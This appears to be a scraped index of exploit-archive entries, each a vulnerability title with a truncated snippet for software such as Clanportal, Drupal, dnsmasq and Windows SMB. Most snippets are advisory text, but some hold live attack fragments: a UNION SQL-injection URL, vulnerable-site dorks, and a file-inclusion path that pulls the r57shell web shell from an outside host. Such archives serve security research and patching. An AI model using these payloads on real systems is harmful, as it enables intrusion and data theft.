DZCP (deV!L_z Clanportal) 1.3.6 - Show SQL Injection
DZCP deV!Lz Clanportal 1.3.6 - Show SQL Injection source: https://www.securityfocus.com/bid/21391/info deV!Lz Clanportal is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could...
ClipShare 3.0.1 - tid SQL Injection
ClipShare 3.0.1 - tid SQL Injection // / / / Clipshare / / / / Remote SQL Injection Vulnerability / / / / / // AUTHOR : SuNHouSe2 ALGERIAN HaCkEr DORK : "powered by clipshare" VERSION : less than v3.0.1 EXPLOIT :...
Elgg 1.7.10 - Multiple Vulnerabilities
Elgg 1.7.10 - Multiple Vulnerabilities Exploit Title: Elgg 1.7.10 Software Link: http://elgg.org/getelgg.php?forward=elgg-1.7.10.zip Version: 1.7.10 = 1. XSS...
Motorola Bootloader - Kernel Cmdline Injection Secure Boot and Device Locking Bypass
Motorola Bootloader - Kernel Cmdline Injection Secure Boot and Device Locking Bypass Sources: https://alephsecurity.com/2017/08/30/untethered-initroot/ https://github.com/alephsecurity/initroot initroot: Motorola Bootloader Kernel Cmdline Injection Secure Boot & Device Locking Bypass CVE-2016-102...
Microsoft Windows 10 (19031909) - SMBGhost SMB3.1.1 SMB2_COMPRESSION_CAPABILITIES Buffer Overflow (PoC)
Microsoft Windows 10 19031909 - SMBGhost SMB3.1.1 SMB2COMPRESSIONCAPABILITIES Buffer Overflow PoC CVE-2020-0796 PoC aka CoronaBlue aka SMBGhost Download https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48216.zip Usage ./CVE-2020-0796.py servername This script...
DZCP (deV!L_z Clanportal) 1.4.9.6 - Blind SQL Injection
DZCP deV!Lz Clanportal 1.4.9.6 - Blind SQL Injection use HTTP::Cookies; use LWP::UserAgent; my $ua = LWP::UserAgent-new cookiejar = HTTP::Cookies-new,; $ua-agent 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ; usage; print "\n"; $server = $ARGV0; $dir = $ARGV1; $username = $ARGV2; $password =...
MusicBox 2.3.8 - Multiple Vulnerabilities
MusicBox 2.3.8 - Multiple Vulnerabilities Exploit Title : Musicbox 2.3.8 Multiple Vulnerabilities Author : DevilScreaM Date : 25/08/2013 Category : Web Applications Vendor : http://www.musicboxv2.com/ Version : 1.0 - 2.3.8 Dork intext:Musicbox Version intext:Musicbox Version 2.3.8 © 2008...
Revive Adserver 4.2 - Remote Code Execution
Revive Adserver 4.2 - Remote Code Execution Exploit Title: Revive Adserver 4.2 - Remote Code Execution Google Dork: "inurl:www/delivery filetype:php" Exploit Author: crlf Vendor Homepage: https://www.revive-adserver.com/ Software Link: https://www.revive-adserver.com/download/archive/ Version:...
Mikrotik WinBox 6.42 - Credential Disclosure (golang)
Mikrotik WinBox 6.42 - Credential Disclosure golang / Title: Mikrotik WinBox 6.42 - Credential Disclosure golang edition Author: Maxim Yefimenko @slider Date: 2018-08-06 Software Link: https://mikrotik.com/download Vendor Page: https://www.mikrotik.com/ Version: 6.29 - 6.42 Tested on: Fedora 28 ...
DZCP (deV!L_z Clanportal) Gamebase Addon - SQL Injection
DZCP deV!Lz Clanportal Gamebase Addon - SQL Injection ======================================================================================== | Title : deV!Lz Clanportal Gamebase Addon SQL Injection Vulnerability | Author Easy Laster | Download : http://www.modsbar.de/Addons/464/gamebase-addon/ ...
UBBCentral UBB.Threads 6.5.1.1 - doeditconfig.php Code Execution
UBBCentral UBB.Threads 6.5.1.1 - doeditconfig.php Code Execution !/usr/bin/php -q -d shortopentag=on ? // UBB.threads Multiple input validation error // Discovered By : HACKERS PAL // Copy rights : HACKERS PAL // Website : http://www.soqor.net // Email Address : [email protected] // Tested on...
Drupal 8.3.9 8.4.6 8.5.1 - Drupalgeddon2 Remote Code Execution (Metasploit)
Drupal 8.3.9 8.4.6 8.5.1 - Drupalgeddon2 Remote Code Execution Metasploit This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Drupalgeddon2', 'Description' = %q CVE-2018-7600 / SA-CORE-2018-002...
PhotoPost 4.6 - PP_PATH Remote File Inclusion
PhotoPost 4.6 - PPPATH Remote File Inclusion ==================================================================== PhotoPost = 4.6 PPPATH Remote File Inclusion Exploit ==================================================================== Critical Level : Dangerous By Saudi Hackrz...
DZCP (deV!L_z Clanportal) Witze Addon 0.9 - SQL Injection
DZCP deV!Lz Clanportal Witze Addon 0.9 - SQL Injection ======================================================================================== | Title : deV!Lz Clanportal Witze Addon Versions 0.9 SQL Injection Vulnerability | Author : Easy Laster | Download :...
Aardvark Topsites PHP 4.2.2 - path Remote File Inclusion
Aardvark Topsites PHP 4.2.2 - path Remote File Inclusion Title: Aardvark Topsites PHP 4.2.2 remote file inclusion URL: http://www.aardvarktopsitesphp.com/ Dork: "Powered By Aardvark Topsites PHP 4.2.2" Exploit:...
Xoops 2.5.4 - Blind SQL Injection
Xoops 2.5.4 - Blind SQL Injection ------------------------------------------ Xoops 2.5.4 Blind SQL Injection ------------------------------------------ Dork: "Powered by XOOPS 2.5.4" Download: http://sourceforge.net/projects/xoops/ Date: 10/12/2011 Author: blkhtc0rp Mail: blkhtc0rpatyahoodotcom...
WebcamXP 3.72.4404.05.280 Beta - show_gallery_pic?id Arbitrary Memory Disclosure
WebcamXP 3.72.4404.05.280 Beta - showgallerypic?id Arbitrary Memory Disclosure source: https://www.securityfocus.com/bid/27875/info webcamXP is prone to multiple information-disclosure and denial-of-service vulnerabilities because it fails to check user-supplied input data. Attackers can exploit...
IdeaBox 1.1 - gorumDir Remote File Inclusion
IdeaBox 1.1 - gorumDir Remote File Inclusion $$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$ $$ $$ IdeaBox = 1.1 gorumDir Remote File Include Vulnerability $$ script site: http://ideabox.phpoutsourcing.com/ $$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$ $$...
PHPizabi 0.848b C1 HP3 - id Local File Inclusion
PHPizabi 0.848b C1 HP3 - id Local File Inclusion source: https://www.securityfocus.com/bid/30707/info PHPizabi is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability using directory-traversal...
glFusion 1.1.2 - COM_applyFilter()cookies Blind SQL Injection
glFusion 1.1.2 - COMapplyFiltercookies Blind SQL Injection 1 // Check user status $status = SECcheckUserStatus$userid; if $status == USERACCOUNTACTIVE || $status == USERACCOUNTAWAITINGACTIVATION $userloggedin = 1; SESSupdateSessionTime$sessid, $CONF'cookieip'; ... see SESSupdateSessionTime functi...
Samba 3.6.2 (x86) - Denial of Service (PoC)
Samba 3.6.2 x86 - Denial of Service PoC !/usr/bin/python """ Exploit for Samba vulnerability CVE-2015-0240 by sleepya The exploit only targets vulnerable x86 smbd 3.6.24 which 'creds' is controlled by ReferentID field of PrimaryName ServerName. That means 'talloczero' in libtalloc does not write a...
Dnsmasq 2.78 - Information Leak
Dnsmasq 2.78 - Information Leak ''' Sources: https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14494.py https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html Sadly, there are no easy docker setup instructions available...
FreeBSD 9.1 - ftpd Remote Denial of Service
FreeBSD 9.1 - ftpd Remote Denial of Service FreeBSD 9.1 ftpd Remote Denial of Service Maksymilian Arciemowicz http://cxsecurity.org/ http://cxsec.org/ Public Date: 01.02.2013 URL: http://cxsecurity.com/issue/WLB-2013020003 --- 1. Description --- I have decided check BSD ftpd servers once again fo...
MWChat 6.7 - Start_Lobby.php Remote File Inclusion
MWChat 6.7 - StartLobby.php Remote File Inclusion source: https://www.securityfocus.com/bid/13849/info MWChat is affected by a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to...
MySQL 5.5.45 - procedure analyse Function Denial of Service
MySQL 5.5.45 - procedure analyse Function Denial of Service !/usr/bin/env python Title: MySQL Procedure Analyse DoS Exploit Author: Osanda Malith Jayathissa @OsandaMalith E-Mail: osandacatunseen.is Version: Vulnerable upto MySQL 5.5.45 Original Write-up:...
webSPELL 4.2.0c - Bypass BBCode Cross-Site Scripting Cookie Stealing
webSPELL 4.2.0c - Bypass BBCode Cross-Site Scripting Cookie Stealing || || || -----------------------------------------\ == -- ----------- ---------------------------- ------------------/ ¡VIVA SPAIN!...¡GANAREMOS EL MUNDIAL!...o.O PROUD TO BE SPANISH!...
Responsive FileManager 9.13.4 - Multiple Vulnerabilities
Responsive FileManager 9.13.4 - Multiple Vulnerabilities Responsive FileManager 9.13.4 - Multiple Vulnerabilities Date: December 12, 2018 Author: farisv Vendor Homepage: https://www.responsivefilemanager.com/ Vulnerable Package Link:...
Fusionphp Fusion News 3.33.6 - X-Forworded-For PHP Script Code Injection
Fusionphp Fusion News 3.33.6 - X-Forworded-For PHP Script Code Injection source: https://www.securityfocus.com/bid/13661/info FusionPHP Fusion News is prone to a remote PHP code injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. Th...
Ebay Clone from clone2009 - SQL Injection
Ebay Clone from clone2009 - SQL Injection / Name : Ebay Clone from clone2009.com Site : http://www.clone2009.com/ Author : Hamza 'MizoZ' N. Email : mizozxatgmaildotcom Greetz : Zuka , GreyMen : / 1st SQL injection : File : gotourl.php , Get : id HOST/PATH/gotourl.php?id=-1+union+select+version-- ...
Dnsmasq 2.78 - Lack of free() Denial of Service
Dnsmasq 2.78 - Lack of free Denial of Service ''' Sources: https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14495.py https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html dnsmasq is vulnerable only if one of the...
Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution
Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution Exploit Title: Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution Date: 2020-02-28 Exploit Author: Photubias Vendor Advisory: 1...
Dnsmasq 2.78 - 2-byte Heap Overflow
Dnsmasq 2.78 - 2-byte Heap Overflow ''' Sources: https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14491.py https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html 1 Build the docker and open three terminals docker build...
Dnsmasq 2.78 - Heap Overflow
Dnsmasq 2.78 - Heap Overflow ''' Sources: https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14492.py https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html 1 Build the docker and open two terminals docker build -t dnsma...
Wordpress Plugin WPForms 1.5.8.2 - Persistent Cross-Site Scripting
Wordpress Plugin WPForms 1.5.8.2 - Persistent Cross-Site Scripting Exploit Title: Wordpress Plugin WPForms 1.5.8.2 - Persistent Cross-Site Scripting Date: 2020-02-18 Vendor Homepage: https://wpforms.com Vendor Changelog: https://wordpress.org/plugins/wpforms-lite/developers Exploit Author: Jinson...
YNP Portal System 2.2.0 - showpage.cgi p Remote File Disclosure
YNP Portal System 2.2.0 - showpage.cgi p Remote File Disclosure YNP Portal System 2.2.0 showpage.cgi p Remote File Disclosure Vulnerability D0RK : inurl:"showpage.cgi?p=popsearch.html" : inurl:"showpage.cgi?p=support.html" : inurl:"showpage.cgi?p=dialup.html" : inurl:"showpage.cgi?p=" POC:...
PHP Script Tools PSY Auction - item.php?id SQL Injection
PHP Script Tools PSY Auction - item.php?id SQL Injection source: https://www.securityfocus.com/bid/17974/info PSY Auction is prone to multiple input-validation vulnerabilities. The issues include HTML-injection and SQL-injection vulnerabilities. These issues are due to a failure in the applicatio...
zFTPServer Suite 6.0.0.52 - rmdir Directory Traversal
zFTPServer Suite 6.0.0.52 - rmdir Directory Traversal !/usr/bin/perl Advisory: zFTPServer Suite 6.0.0.52 'rmdir' Directory Traversal Author: Stefan Schurtz Contact: [email protected] Affected Software: Successfully tested on zFTPServer Suite 6.0.0.52 Vendor URL: http://www.zftpserver.com/ Vend...
TLS - Renegotiation
TLS - Renegotiation !/usr/bin/env python RedTeam Pentesting GmbH [email protected] http://www.redteam-pentesting.de PoC exploit for the TLS renegotiation vulnerability CVE-2009-3555 License ------- CC-BY-SA http://creativecommons.org/licenses/by-sa/3.0/ Timeline -------- 2009-12-21...
SweetRice 1.5.1 - Backup Disclosure
SweetRice 1.5.1 - Backup Disclosure Title: SweetRice 1.5.1 - Backup Disclosure Application: SweetRice Versions Affected: 1.5.1 Vendor URL: http://www.basic-cms.org/ Software URL: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip Discovered by: Ashiyane Digital Security Team Tested on: Windo...
OpenVPN 2.2.29 - Shellshock Remote Command Injection
OpenVPN 2.2.29 - Shellshock Remote Command Injection Exploit Title: ShellShock OpenVPN Exploit Date: Fri Oct 3 15:48:08 EDT 2014 Exploit Author: hobbily AKA @fj33r Version: 2.2.29 Tested on: Debian Linux CVE : CVE-2014-6271 Probably should have submitted this the day I tweeted it. server.conf port...
Linux Kernel 4.11.8 - mq_notify: double sock_put() Local Privilege Escalation
Linux Kernel 4.11.8 - mqnotify: double sockput Local Privilege Escalation / CVE-2017-11176: "mqnotify: double sockput" by LEXFO 2018. DISCLAIMER: The following code is for EDUCATIONAL purpose only. Do not use it on a system without authorizations. WARNING: The exploit WILL NOT work on your target...
CuteNews 1.4.1 - show_news.php Cross-Site Scripting
CuteNews 1.4.1 - shownews.php Cross-Site Scripting source: https://www.securityfocus.com/bid/16740/info CuteNews is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before including it in dynamically generate...
RemoteMouse 3.008 - Arbitrary Remote Command Execution
RemoteMouse 3.008 - Arbitrary Remote Command Execution Exploit Title: Remote Mouse 3.008 - Failure to Authenticate Date: 2019-09-04 Exploit Author: 0rphon Software Link: https://www.remotemouse.net/ Version: 3.008 Tested on: Windows 10 Remote Mouse 3.008 fails to check for authentication and will...
ClanSphere 2011.3 - cs_lang Cookie Local File Inclusion
ClanSphere 2011.3 - cslang Cookie Local File Inclusion Exploit Title: ClanSphere 2011.3 cslang cookie parameter Local File Include Vulnerability Google Dork: "Copyright 2012 Seitentitel. All rights reserved." || inurl:index.php?mod=clansphere Date: 10/22/2012 Author: Marco Tulio blkhtc0rp Vendor...
lighttpd - Denial of Service (PoC)
lighttpd - Denial of Service PoC 29 of November 2011 was the date of public disclosure interesting vulnerability in lighttpd server. Xi Wang discovered that modauth for this server does not properly decode characters from the extended ASCII table. The vulnerable code is below: "src/httpauth.c:67"...
Gallery 2.0 - main.php Directory Traversal
Gallery 2.0 - main.php Directory Traversal source: https://www.securityfocus.com/bid/15108/info Gallery is prone to a directory traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. Exploitation of this vulnerability could lead to a...
FortiOS 5.6.3 - 5.6.7 FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure (Metasploit)
FortiOS 5.6.3 - 5.6.7 FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure Metasploit Exploit Title: FortiOS Leak file - Reading login/passwords in clear text. Google Dork: intext:"Please Login" inurl:"/remote/login" Date: 17/08/2019 Exploit Author: Carlos E. Vieira Vendor Homepage:...
phpCodeGenie 3.0.2 - BEAUT_PATH Remote File Inclusion
phpCodeGenie 3.0.2 - BEAUTPATH Remote File Inclusion / + + - - - DEVIL TEAM THE BEST POLISH TEAM - - + + + - phpCodeGenie app/common/lib/codeBeautifier/Beautifier/Core.php line 20-25: .... includeonce$BEAUTPATH."/Beautifier/HFile.php"; includeonce$BEAUTPATH."/Beautifier/Context.php"; class Core...
TSEP 0.942 - colorswitch.php Remote File Inclusion
TSEP 0.942 - colorswitch.php Remote File Inclusion Script: TSEP Comments: "registerglobals" must be enabled duh. document.this != http://www.milw0rm.com/exploits/2098 Vulnerable Files/Code: ./tsep.0942/include/colorswitch.php?tsepconfigabsPath=http://rst.void.ru/download/r57shell.txt?...
Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
Alcatel-Lucent Nokia GPON I-240W-Q - Buffer Overflow !/usr/bin/python3 import argparse import requests import urllib.parse import binascii import re def runtarget: """ Execute exploitation """ We're using CVE-2018-10561 and/or its extension in order to exploit this Authenticated RCE in usbForm...